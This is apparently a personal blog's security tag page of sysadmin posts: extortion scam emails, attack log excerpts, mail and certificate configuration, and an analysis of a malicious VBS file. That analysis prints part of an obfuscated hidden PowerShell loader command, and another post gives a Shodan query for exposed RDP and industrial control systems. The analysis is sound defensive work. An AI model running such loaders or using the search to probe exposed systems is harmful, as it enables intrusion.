News items for tag security - Koos van den Hout

2019-02-06 Meer afpersmail met bitcoins 1 week ago
Het blijft actueel: Verschillende afpersmails in omloop - Fraudehelpdesk.

Ik zie ze zelf ook op verschillende plekken. Trap hier niet in.

Dit keer een bitcoin adres waar nog geen transacties in zichtbaar zijn: 12PUa2SHjWAUEpZZUxQNvxa7epab7g2Ksb alleen is mij niet duidelijk of deze site het verschil tussen een echt aangemaakt adres zonder transacties of een willekeurig adres weet.

Toevoeging 2019-02-07: Een bedrag van 808 dollars in bitcoins staat nu in de wallet, in 2 transacties. Gegeven het bedrag in het originele mailtje zijn er dus 2 mensen ingetrapt.

Toevoeging 2019-02-11: Er is nu over de 3000 dollar in bitcoins binnen. Als ik zo naar de transacties kijk lijken er 7 mensen ingetrapt.

Nog meer informatie: Bitcoin Abuse Database for 12PUa2SHjWAUEpZZUxQNvxa7epab7g2Ksb (engelstalig).

Tags: , ,
2019-01-08 Seeing the 451: Unavailable due to legal reasons in the wild 1 month ago
Today I tried to follow a link to http://www.independentri.com/ but I got an error message:
451: Unavailable due to legal reasons

We recognize you are attempting to access this website from a country belonging to the European Economic Area (EEA) including the EU which enforces the General Data Protection Regulation (GDPR) and therefore access cannot be granted at this time
And indeed in the headers:
$ lynx -head -dump http://www.independentri.com/
HTTP/1.1 451 Unavailable For Legal Reasons
I see the real reason as 'not wanting to comply with European consumer protection laws'. I have no idea how many visitors the site is missing due to this regionblock but since it's a regional weekly newspaper in the United States of America: probably not a lot of the intended audience.

Tags: , ,
2018-12-14 Afpersingsmail die blijkbaar werkt 2 months ago
Ik kreeg een mail zoals deze Afpersingsmail: Bedreiging voor uw veiligheid! ***@*********.nl is gecompromitteerd. - Fraudehelpdesk.

De tekst leest kwa stijl of de auteur niet echt Nederlands kent en deels hulp heeft gehad van een automatische vertaling of van meerdere mensen die stukjes vertaald hebben.

Het volgen van het bitcoin adres in het mailtje (deels gemaskeerd bij fraudehelpdesk) levert een interresant beeld op: dit levert blijkbaar wel wat op. Als ik de bitcoin rekening opzoek op Bitcoin Address 1PRUG1TrBWKLpvMJYfYXhZVSDagSySqXuz zie ik diverse bijschrijvingen in de afgelopen twee dagen en een afschrijving. De eerste drie bijschrijvingen lijken erg op betalingen in de buurt van de genoemde 35 euro. Maar als ik diep in de transacties duik zonder enige voorkennis van bitcoin zie ik allemaal verwarrende dingen.

Opvallend is wel dat dezelfde wallet dus op meer plekken genoemd is. Daarmee is het traceren van degene die betaald heeft onmogelijk, waardoor het verhaal in de afpersingsmail ook compleet ongeldig is.

Tags: , ,
2018-10-03 Seeing the same names in logcheck mails every hour 4 months ago
I use the logcheck package to monitor for unexpected log entries. Since upgrading to the new homeserver conway I noticed DNSSEC failures coming back regularly, even at weird times of the night while the domain names seemed related to services we sometimes interact with during the day. To search deeper I enabled query logging on DNS (with a short retention period) in order to find the source.

Eventually I found it: the DNSSEC failures came at the time the mail from logcheck was delivered, because it mentioned domain names that cause a DNSSEC failure. So the way to 'fix' this problem and avoid similar other problems was to whitelist logcheck mail.

Update 2018-10-05: That only helps when enabling the Mail::SpamAssassin::Plugin::Shortcircuit plugin and enabling the USER_IN_WHITELIST shortcircuit.

Update 2018-10-07: Even with whitelist and shortcircuit I still see queries for domain names in the logcheck mails. Call to spamassassin is now changed...

Now, once again...this time with FEEwing

Tags: , ,
2018-10-01 Getting distracted on shodan 4 months ago
This morning I was looking on shodan for open remote desktop servers in the work network since RDP was mentioned as an attack vector in the latest GANDCRAP ransomware.

Searching for '3389' on shodan found something completely different: an open industrial control system (ICS) for tankstation gauges.
IN-TANK VOORRAAD        

TANK PRODUCT             VOLUME TC VOLUME   VULVOL   HOOGTE    WATER     TEMP
  1  UL 98                 9757      9693    10283    939.2      0.0    20.09
  2  EURO                 2...
According to The Internet of Gas Station Tank Gauges -- Take #2 - Rapid7 this was already a reported issue in January 2015 and according to their research it may be possible to do bad things with this access.

The above is from a gas station I can find on google maps.

Oh I found the way to search for open remote desktop servers on shodan: port:3389.

Tags: , , ,
2018-09-14 IT attacks in higher education have interesting holiday patterns 5 months ago
According to this article: Students blamed for university and college cyber-attacks - BBC News the new pattern is that attacks on IT systems in higher education happen in active times in education.

Interesting quote (for me):
There was a very sharp decline in attacks in the Christmas, Easter and summer breaks and during half-terms - with attacks rising again sharply when terms resumed.
I remember starting in system administration and learning quickly that the Christmas holidays period was the busiest period in attempts to break in to computer systems all over the world. This was simply explained by the fact that the Christmas holidays are the most universal school holiday in the world and all the teenage hackers had time to play with computers, modems and networks.

Tags: , ,
2018-08-17 Trying (and failing) to correlate security logs 6 months ago
Since activating sendmail authentication with secondary passwords I see a number of attempts to guess credentials to send mail via my system. This is not very surprising, given the constant attack levels on the wider Internet.

For work I am looking at log correlation and monitoring and with that in mind I noted that finding the right information from sendmail where and when the attempt came from is quite hard since there are several processes busy and it's hard to correlate the logging. The failed attempt is logged by saslauthd in /var/log/auth.log:
Aug 16 12:28:57 greenblatt saslauthd[32648]: pam_unix(smtp:auth): check pass; user unknown
Aug 16 12:28:57 greenblatt saslauthd[32648]: pam_unix(smtp:auth): authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=
Aug 16 12:28:59 greenblatt saslauthd[32648]: do_auth         : auth failure: [user=monster] [service=smtp] [realm=idefix.net] [mech=pam] [reason=PAM auth error]
Aug 16 12:29:00 greenblatt saslauthd[32649]: pam_unix(smtp:auth): check pass; user unknown
Aug 16 12:29:00 greenblatt saslauthd[32649]: pam_unix(smtp:auth): authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=
Aug 16 12:29:02 greenblatt saslauthd[32649]: do_auth         : auth failure: [user=monster] [service=smtp] [realm=] [mech=pam] [reason=PAM auth error]
This is probably related to this sendmail log information:
Aug 16 12:28:56 greenblatt sm-mta[20716]: STARTTLS=server, relay=62.82.128.182.static.user.indesat.com [62.82.128.182] (may be forged), version=TLSv1/SSLv3, verify=NO, cipher=DHE-RSA-AES256-SHA, bits=256/256
Aug 16 12:29:02 greenblatt sm-mta[20716]: w7GASspx020716: 62.82.128.182.static.user.indesat.com [62.82.128.182] (may be forged) did not issue MAIL/EXPN/VRFY/ETRN during connection to MSP-v6
But I can't be sure as there are multiple 'did not issue MAIL/EXPN/VRFY/ETRN' messages in the logs. So I can't build a fail2ban rule based on this.

Tags: , , ,
2018-08-13 False advertising from antivirus software in e-mail 6 months ago
----- No virus found in this message. Checked by AVG - www.avg.com Version: 2014
.0.4830 / Virus Database: 4365/10772 - Release Date: 13/08/18

[-- Attachment #2: doc10089752487652120190813.docx.jar --]
I guess No known virus found was a better message for AVG.

Tags: , ,
2018-08-11 Testing login credentials from dataleaks 6 months ago
The authenticated SMTP setup with sendmail and secondary passwords I created is also attracting a new kind of attack: trying credentials from dataleaks. Leading to interesting tries in the log:
Aug 10 17:29:01 greenblatt saslauthd[32650]: do_auth         : auth failure: [user=409shop.com] [service=smtp] [realm=] [mech=pam] [reason=PAM auth error]
Aug 11 10:48:42 greenblatt saslauthd[32649]: do_auth         : auth failure: [user=409shop.com] [service=smtp] [realm=] [mech=pam] [reason=PAM auth error]

Tags: ,
2018-07-27 Automating Let's Encrypt certificates with DNS-01 protocol 6 months ago
Encrypt all the things meme After thoroughly automating Let's Encrypt certificate renewal and installation I wanted to get the same level of automation for systems that do not expose an http service to the outside world. So that means the DNS-01 challenge within the ACME protocol has to be used.

I found out dehydrated Let's Encrypt certificate management supports DNS-01 and I found a sample on how to do this with bind9 at Example hook script using Dynamic DNS update utility for dns-01 challenge which looks like it can do the job.

It took me a few failed tries to find out that if I want a certificate for the name turing.idefix.net that it will request the TXT record for _acme-challenge.turing.idefix.net to make me prove that I have control over the right bit of DNS. I first assumed something in _acme-challenge.idefix.net which turned out wrong. So the bind9 config in /etc/bind/named.conf.local has:
zone "_acme-challenge.turing.idefix.net" {
        type master;
        file "/var/cache/bind/_acme-challenge.turing.idefix.net-zone";
        masterfile-format text;
        allow-update { key "acmekey-turing"; };
        allow-query { any; };
        allow-transfer {
                localnetwork;
        };
};
And in the idefix.net zone there is just one delegation:
_acme-challenge.turing  IN      NS      ns2
I created and used a dnskey with something like:
# dnssec-keygen -r /dev/random -a hmac-sha512 -b 128 -n HOST acmekey-turing
Kacmekey-turing.+157+53887
This gives 2 files, both with the right secret:
# ls Kacmekey-turing.+157+53887.*
Kacmekey-turing.+157+53887.key  Kacmekey-turing.+157+53887.private
# cat Kacmekey-turing.+157+53887.key
acmekey-turing. IN KEY 512 3 157 c2V0ZWMgYXN0cm9ub215
and configured it in /etc/bind/named.conf.options:
key "acmekey-turing" {
        algorithm hmac-md5;
        secret "c2V0ZWMgYXN0cm9ub215";
};
And now I can request a key for turing.idefix.net and use it to generate sendmail certificates. And the net result:
        (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-GCM-SHA384 bits=256          
        verify=OK)                                                              
SMTP between systems with TLS working and good certificates.

Tags: , , ,
2018-07-19 Configuring sendmail authentication like imaps access to allow secondary passwords 7 months ago
I needed to configure sendmail authenticated access because I want a strict SPF record for idefix.net which means I always have to make outgoing mail originate from the right server.

For the sendmail authenticated smtp bit I used How to setup and test SMTP AUTH within Sendmail with some configuration details from Setting up SMTP AUTH with sendmail and Cyrus-SASL. To get this running saslauthd is needed to get authentication at all and I decided to let it use the pam authentication mechanism. The relevant part of sendmail.mc:
include(`/etc/mail/sasl/sasl.m4')dnl
define(`confAUTH_OPTIONS', `A p')dnl
define(`confAUTH_MECHANISMS', `LOGIN PLAIN')dnl
TRUST_AUTH_MECH(`LOGIN PLAIN')dnl
And now I can login to sendmail only in an encrypted session. And due to sendmail and other services now having valid certificates I can set up all devices to fully check the certificate so I make it difficult to intercept this password.

And after I got that working I decided I wanted 'secondary passwords' just like I configured extra passwords for IMAPS access so I set up /etc/pam.d/smtp to allow other passwords than the unix password and restrict access to the right class of users.
auth    required    pam_succeed_if.so quiet user ingroup users
auth    [success=1 default=ignore]      pam_unix.so nullok_secure
auth    sufficient  pam_userdb.so db=/etc/courier/extrausers crypt=crypt use_first_pass
# here's the fallback if no module succeeds
auth    requisite                       pam_deny.so
Now I can set up my devices that insist on saving the password for outgoing smtp and if it ever gets compromised I just have to change that password without it biting me too hard.

Tags: , , ,
2018-07-08 Automating Let's Encrypt certificates further 7 months ago
Encrypt all the things meme Over two years ago I started using Let's Encrypt certificates. Recently I wanted to automate this a step further and found dehydrated automated certificate renewal which helps a lot in automating certificate renewal with minimal hassle.

First thing I fixed was http-based verification. The webserver has been set up to make all .well-known/acme-challenge directories end up in one place on the filesystem and it turns out this works great with dehydrated.

I created a separate user for dehydrated, gave that user write permissions for the /home/httpd/html/.well-known/acme-challenge directory. It also needs write access to /etc/dehydrated for its own state. I changed /etc/dehydrated/config with:
CHALLENGETYPE="http-01"
WELLKNOWN="/home/httpd/html/.well-known/acme-challenge"
Now it was possible to request certificates based on a .csr file. I used this to get a new certificate for the home webserver, and it turned out to be easier than the previous setup based on letsencrypt-nosudo.
Read the rest of Automating Let's Encrypt certificates further

Tags: , , , ,
2018-06-25 Distributed ssh attack 7 months ago
SSH attacks are on the rise. But fail2ban isn't blocking as much of those attacks as it used to since the attacks are quite distributed. This morning I noticed clear correlation between a subset of the attempts, they were all using names of websites hosted on the same system.
Jun 25 06:18:44 greenblatt sshd[10092]: Invalid user campwireless from 95.111.97.96
Jun 25 06:29:21 greenblatt sshd[10993]: Invalid user camp-wireless from 206.189.158.105
Jun 25 06:30:51 greenblatt sshd[11073]: Invalid user campwireless from 211.118.23.85
Jun 25 06:41:43 greenblatt sshd[12213]: Invalid user camp-wireless from 80.191.115.125
Jun 25 06:50:01 greenblatt sshd[12962]: Invalid user campwireless from 46.24.225.3
Jun 25 06:59:39 greenblatt sshd[13794]: Invalid user camp-wireless from 58.221.14.202
Jun 25 07:35:27 greenblatt sshd[16771]: Invalid user virtualbookcase from 98.248.65.243
Jun 25 07:35:36 greenblatt sshd[16779]: Invalid user campwireless from 109.95.210.175
Jun 25 07:39:28 greenblatt sshd[17175]: Invalid user camp-wireless from 88.170.50.242
Jun 25 07:46:01 greenblatt sshd[17570]: Invalid user camp-wireless from 166.70.198.80
Jun 25 07:54:59 greenblatt sshd[18273]: Invalid user camp-wireless from 187.104.5.246
Jun 25 07:59:48 greenblatt sshd[18754]: Invalid user idefix from 188.19.15.188
Jun 25 08:02:08 greenblatt sshd[18926]: Invalid user idefix from 179.219.129.91
Jun 25 08:05:54 greenblatt sshd[19358]: Invalid user virtualbookcase from 118.114.237.235
Jun 25 08:09:45 greenblatt sshd[19809]: Invalid user urlurl from 111.231.89.130
Jun 25 08:26:35 greenblatt sshd[21183]: Invalid user urlurl from 212.156.83.146
Jun 25 08:29:07 greenblatt sshd[21357]: Invalid user camp-wireless from 37.205.177.106
Jun 25 08:43:04 greenblatt sshd[22400]: Invalid user campwireless from 190.85.83.230
Jun 25 08:45:45 greenblatt sshd[22558]: Invalid user campwireless from 35.161.235.34
Jun 25 09:01:30 greenblatt sshd[23883]: Invalid user urlurl from 180.76.160.50
Jun 25 09:08:17 greenblatt sshd[24516]: Invalid user camp-wireless from 60.251.223.115
Jun 25 09:23:47 greenblatt sshd[26042]: Invalid user camp-wireless from 106.51.76.93
Jun 25 09:45:27 greenblatt sshd[27812]: Invalid user camp-wireless from 62.254.31.162
Jun 25 09:56:02 greenblatt sshd[28617]: Invalid user campwireless from 212.77.72.170
Jun 25 10:06:47 greenblatt sshd[29707]: Invalid user campwireless from 123.207.139.72
Jun 25 10:14:58 greenblatt sshd[30250]: Invalid user camp-wireless from 81.95.114.163
Jun 25 10:15:43 greenblatt sshd[30317]: Invalid user camp-wireless from 193.112.166.253
Jun 25 10:19:17 greenblatt sshd[30698]: Invalid user campwireless from 211.54.146.250
Jun 25 10:19:25 greenblatt sshd[30702]: Invalid user urlurl from 178.91.253.138
Jun 25 10:32:42 greenblatt sshd[31743]: Invalid user idefix from 85.120.15.35
Jun 25 11:04:33 greenblatt sshd[2346]: Invalid user campwireless from 213.138.110.89
This suggests coordination between the attacking systems.

But the simpler attacks do continue:
Jun 25 09:17:31 greenblatt sshd[25579]: Invalid user cristina from 202.29.224.50
Jun 25 09:17:35 greenblatt sshd[25582]: Invalid user cristina from 202.29.224.50
Jun 25 09:17:39 greenblatt sshd[25586]: Invalid user cristina from 202.29.224.50
Jun 25 09:17:39 greenblatt sshd[25585]: Invalid user cristina from 202.29.224.50

Tags: ,
2018-06-22 Slow password guessing for imaps 8 months ago
Interesting in the logs:
Jun 19 21:22:29 greenblatt imapd-ssl: LOGIN FAILED, method=PLAIN, ip=[::ffff:5.188.207.9]
Jun 19 21:23:30 greenblatt imapd-ssl: LOGIN FAILED, method=PLAIN, ip=[::ffff:5.188.207.9]
Jun 19 21:27:05 greenblatt imapd-ssl: LOGIN FAILED, method=PLAIN, ip=[::ffff:5.188.207.11]
Jun 19 21:31:58 greenblatt imapd-ssl: LOGIN FAILED, method=PLAIN, ip=[::ffff:5.188.207.11]
Jun 19 22:27:15 greenblatt imapd-ssl: LOGIN FAILED, method=PLAIN, ip=[::ffff:5.188.207.9]
Jun 19 22:30:10 greenblatt imapd-ssl: LOGIN FAILED, method=PLAIN, ip=[::ffff:5.188.207.9]
Jun 19 22:44:17 greenblatt imapd-ssl: LOGIN FAILED, method=PLAIN, ip=[::ffff:5.188.207.11]

..

Jun 22 14:23:39 greenblatt imapd-ssl: LOGIN FAILED, method=PLAIN, ip=[::ffff:5.188.207.11]
Jun 22 14:24:35 greenblatt imapd-ssl: LOGIN FAILED, method=PLAIN, ip=[::ffff:5.188.207.11]
Jun 22 15:20:05 greenblatt imapd-ssl: LOGIN FAILED, method=PLAIN, ip=[::ffff:5.188.207.9]
Jun 22 15:21:01 greenblatt imapd-ssl: LOGIN FAILED, method=PLAIN, ip=[::ffff:5.188.207.9]
Jun 22 15:29:18 greenblatt imapd-ssl: LOGIN FAILED, method=PLAIN, ip=[::ffff:5.188.207.11]
Jun 22 15:30:06 greenblatt imapd-ssl: LOGIN FAILED, method=PLAIN, ip=[::ffff:5.188.207.11]
Every time fail2ban blocks the addresses for a while but the attacker is more persistant than that.

Tags: ,
2018-06-19 I don't run your nameserver 8 months ago
Showing in the logs since a few hours:
Jun 18 12:48:36 server named[16424]: client 92.247.148.230#38664: query '1.3.20.172.in-addr.arpa/PTR/IN' denied
Jun 18 12:48:39 server named[16424]: client 92.247.148.230#38664: query '14.0.20.172.in-addr.arpa/PTR/IN' denied
Jun 18 12:48:45 server named[16424]: client 92.247.148.230#38664: query '41.1.20.172.in-addr.arpa/PTR/IN' denied
Jun 18 12:48:47 server named[16424]: client 92.247.148.230#38664: query '6.1.20.172.in-addr.arpa/PTR/IN' denied
Given earlier reports of the same IPv4 address asking about the same queries this has been seen by at least one other place before. Blacklisted for now, maybe I can think of some answers that can slow down the resolver later.

Tags: ,
2018-05-22 The linkspammers are back, but they are trying to hide it a lot better 9 months ago
Over the years I have ranted several times about linkspammers. About spammers in general too, but linkspammers are a special category.

Most of them, especially the fully automated ones died when google started detecting their deceit. That time there was some amusement to be had reading mails "somehow there is an evil link to my site from your site, please remove it as it affects both our google ranking".

But now they are back, but trying to hide it a lot better. I received several nicey-nicey and helpful mails with really personal suggestions to improve my site, or improve the world in general by adding some link they proposed, complete with the right anchor text.

At first I thought they were personal and answered them telling them the proposed links were wrong, or they had not read the article/post/.. they wanted to change very carefully.

And then a week or two later I'd get another personal mail asking whether I had considered their previous request. And answering with "did you read my answer?" did not change a thing.

My best guess at the moment is that I wasn't looking at a personal mail and that I should add a lot of airquotes about terms like "personal" above. It's a template with 'page X' 'needs link Y' and 'with anchor text Z' and there is software running that checks whether page X has the 'right' link and keeps sending reminders until it does.

As you can imagine (or not), I feel very annoyed by this new scam tactic.

One sample:
Hi pal,

My name is Oliver and I'm writing to share an infographic that aims to educate people about PTSD amongst our veterans and serving military personnel. The infographic is titled "The Silent Enemy: How PTSD Damages Our Soldiers".

You can view the infographic by clicking here: [link]

To spread the word about these issues, I ask if you could add a "weblink" to this infographic from this page on your own website: https://idefix.net/~koos/newsitem.cgi/1318581406 Note how this page has only a link to 'military' but actually reading it for 4 seconds would let you know that it has no link to PTSD in the military.

I chose this page because you already link to www.af.mil/News/Photos/ from this page.

If this is possible, you could add the below text to this page on your own websi te:

The Silent Enemy: How PTSD Damages Our Soldiers – An infographic aiming to raise awareness about PTSD in the military.

Alternatively, you could also publish the infographic on your website as a "guest blog post". If this is OK, I can write a unique introduction to go with the infographic. This will save you time and also help to highlight the important issues covered in the infographic.

I really appreciate your time. I know that linking to this infographic will help to build awareness about mental health issues amongst veterans and serving memb ers of the military. I'm sure this is a cause you would like to get behind by adding the above link. I've actually attached the infographic to this email for you to add to your website at either the page I suggest or as a fresh blog post.

Many thanks,

Oliver Clark

Rehab 4 Alcoholism

Please click on Unsubscribe to be unsubscribed from any future communications. P rivacy notice.
The last line is quite a hint that this is from an automated system, the stories are somewhat long so this isn't always very visible.

Now I also wonder whether the link would be to a very commercial rehab organisation.

Tags: , , ,
2018-05-05 High-Tech Bridge 'security scan' causing big noise in the logs 9 months ago
I noticed a lot of error messages from sshd/imaps and other services all related to IPv4 address 192.175.111.254. Checking the firewall logs found even more attempts.

It seems all this noise is related to a 'Web Server Security Test' from High-Tech Bridge. Something like the Qualys SSL Labs SSL Server Test but aimed at a complete test according to PCI DSS, HIPAA and NIST. Since most of those standards have to do with procedures too an automated test can never be complete.

But with all these errors and firewall log entries it is very noisy. And now I wonder who was interested in my webserver security at a time that I was asleep.

Tags: ,
2018-04-07 I'm glad you read my newsitem 10 months ago
Apr  6 23:41:16 greenblatt sshd[25116]: Invalid user squid from 139.99.122.129
Apr  7 01:44:09 greenblatt sshd[3495]: Invalid user squid from 110.10.189.108
Apr  7 08:21:37 greenblatt sshd[7106]: Invalid user squid from 118.24.100.11
I'm glad you read my newsitem about keeping squid running.

Tags: , ,
2018-03-14 Try anything as an open webproxy 11 months ago
It seems any open port can be tried as an open webproxy. An open webproxy is interesting for hiding tracks or getting around restrictions. But some of the scans are getting stupid. There are still a lot of other tcp-based services, not everything is HTTP.

From recent logs:
Mar 14 13:46:42 greenblatt nnrpd[20297]: 185.100.87.248 unrecognized GET / HTTP/1.0                                                                             
Mar 14 13:46:47 greenblatt nnrpd[20299]: 185.100.87.248 unrecognized OPTIONS / HTTP/1.0                                                                         
Mar 14 13:46:52 greenblatt nnrpd[20301]: 185.100.87.248 unrecognized OPTIONS / RTSP/1.0                                                                         
And this gem of distributed scanning:
Mar  8 08:45:00 greenblatt sm-mta[6355]: w287j0dE006355: 78.84.202.1.static.bjtelecom.net: probable open proxy: command=GET http://www.boxun.com/ HTTP/1.1\r\n
Mar  8 08:45:00 greenblatt sm-mta[6359]: w287j0V0006359: [14.204.118.100]: probable open proxy: command=GET http://www.minghui.org/ HTTP/1.1\r\n
Mar  8 08:45:00 greenblatt sm-mta[6360]: w287j0lM006360: [14.204.94.84]: probable open proxy: command=GET http://www.rfa.org/ HTTP/1.1\r\n
Mar  8 08:45:04 greenblatt sm-mta[6353]: w287j4lq006353: [110.177.75.38]: probable open proxy: command=GET http://www.baidu.com/ HTTP/1.1\r\n
Mar  8 08:45:04 greenblatt sm-mta[6356]: w287j4io006356: [101.249.104.160]: probable open proxy: command=GET http://www.bing.com/ HTTP/1.1\r\n
Mar  8 08:45:04 greenblatt sm-mta[6357]: w287j4h0006357: [119.118.16.42]: probable open proxy: command=GET http://wujieliulan.com/ HTTP/1.1\r\n
Mar  8 08:45:05 greenblatt sm-mta[6358]: w287j5pu006358: [112.66.106.4]: probable open proxy: command=CONNECT www.voanews.com:443 HTTP/1.0\r\n
Mar  8 08:45:05 greenblatt sm-mta[6354]: w287j5bt006354: 36.49.239.221.broad.tj.tj.dynamic.163data.com.cn [221.239.49.36] (may be forged): probable open proxy: command=GET http://www.123cha.com/ HTTP/1.1\r\n
Interesting timing and coordination on this one, looks like some form of central control was involved.

Tags: ,
2018-03-05 Obfuscating powershell with -encoded and UTF-16 11 months ago
In some files I noticed a vbs file where I expected something else. Vbs sounds like visual basic script so I directly started looking for malware. And indeed I saw suspicous code, with a for me new type of obfuscation.

The vbs has one really long line, beginning with:
CreateObject("Wscript.Shell").Run("powershell -w hidden -ep bypass -enc aQBuAHYA
bwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACgAIgB7ADQAOAB9AHsAMQAyAH0AewAyADgAfQB7ADEA
MAAzAH0AewAyADEAfQB7ADkAfQB7ADEAMAA2AH0AewA3ADAAfQB7ADIAOAB9AHsAOAB9AHsAMAB9AHsA
and at the end:
IgByACIALAAiAGsAIgAsACIAYQAiACwAIgAgACIALAAiAHYAIgAsACIAZwAiACwAIgBzACIALAAiAGUA
IgAsACIAbgAiACwAIgArACIALAAiAHQAIgAsACIAcgAiACwAIgAiACwAIgB0ACIALAAiAHAAIgAsACIA
ZQAiACwAIgBlACIALAAiAC8AIgAsACIAZQAiACwAIgBTACIAKQA=")
Which looked very base64-like to me. But standard tools could not find out what it was:
$ base64 -d < base64part | file -
/dev/stdin: data
But with a second look I could make out something:
$ base64 -d < base64part | xxd | less
0000000: 6900 6e00 7600 6f00 6b00 6500 2d00 6500  i.n.v.o.k.e.-.e.
0000010: 7800 7000 7200 6500 7300 7300 6900 6f00  x.p.r.e.s.s.i.o.
0000020: 6e00 2800 2200 7b00 3400 3800 7d00 7b00  n.(.".{.4.8.}.{.
0000030: 3100 3200 7d00 7b00 3200 3800 7d00 7b00  1.2.}.{.2.8.}.{.
0000040: 3100 3000 3300 7d00 7b00 3200 3100 7d00  1.0.3.}.{.2.1.}.
0000050: 7b00 3900 7d00 7b00 3100 3000 3600 7d00  {.9.}.{.1.0.6.}.
0000060: 7b00 3700 3000 7d00 7b00 3200 3800 7d00  {.7.0.}.{.2.8.}.
0000070: 7b00 3800 7d00 7b00 3000 7d00 7b00 3200  {.8.}.{.0.}.{.2.
0000080: 7d00 7b00 3400 3100 7d00 7b00 3100 3100  }.{.4.1.}.{.1.1.
0000090: 3300 7d00 7b00 3600 3600 7d00 7b00 3000  3.}.{.6.6.}.{.0.
Suddenly there is UTF-16 powershell code. Or when I simply cat it to a terminal:
invoke-expression("{48}{12}{28}{103}{21}{9}{106}{70}{28}{8}{0}{2}{41}{113}{66}
[..]
-f "t","2"," ",".","i","f","C","'","c","o","2",")","n","n","0","c","'","/",
It looks like some kind of array mapping, but I have no idea how to decode this into readable code to check what it does. I am quite sure it can't be up to any good if I keep finding levels of obfuscation!

Tags: ,
  Older news items for tag security ⇒
, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred.

PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers pgp key statistics for 0x5BA9368BE6F334E4 Koos van den Hout
RSS
Other webprojects: Camp Wireless, wireless Internet access at campsites, The Virtual Bookcase, book reviews